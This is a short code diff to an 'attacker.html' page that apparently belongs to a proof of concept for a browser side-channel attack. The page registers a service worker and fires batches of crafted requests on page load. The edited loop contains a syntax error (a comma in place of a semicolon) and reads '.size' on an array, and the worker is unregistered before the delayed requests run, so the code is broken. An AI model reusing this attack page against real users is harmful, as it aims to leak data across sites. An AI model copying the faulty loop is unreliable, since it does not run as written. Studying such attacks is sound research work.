--- a/src/range-serviceworker/attacker.html
+++ b/src/range-serviceworker/attacker.html
@@ -47,9 +47,9 @@
         elements.push(resource.split('.')[0]);
       };
 
-      var i = 0;
 
       let requests = [];
+
       for (const element of elements) {
         for (const resource of resources) {
           for (const size of sizes) {
@@ -57,17 +57,18 @@
           }
         }
       }
+      
 
-      function next() {
-        console.log(requests);
-        get(requests[i][0], requests[i][1], requests[i][2]);
-        i++;
+      function run() {
+        for (let i = 0; i < requests.size, i++) {
+          setTimeout(get, (i + 1) * 1000, requests[i][0], requests[i][1], requests[i][2]);
+        }
       }
 
       if ('serviceWorker' in navigator) {
 				addEventListener('load', async () => {
 					const registration = await navigator.serviceWorker.register('serviceworker.js');
-          next();
+          run();
           await registration.unregister();
 				});
 			} else {
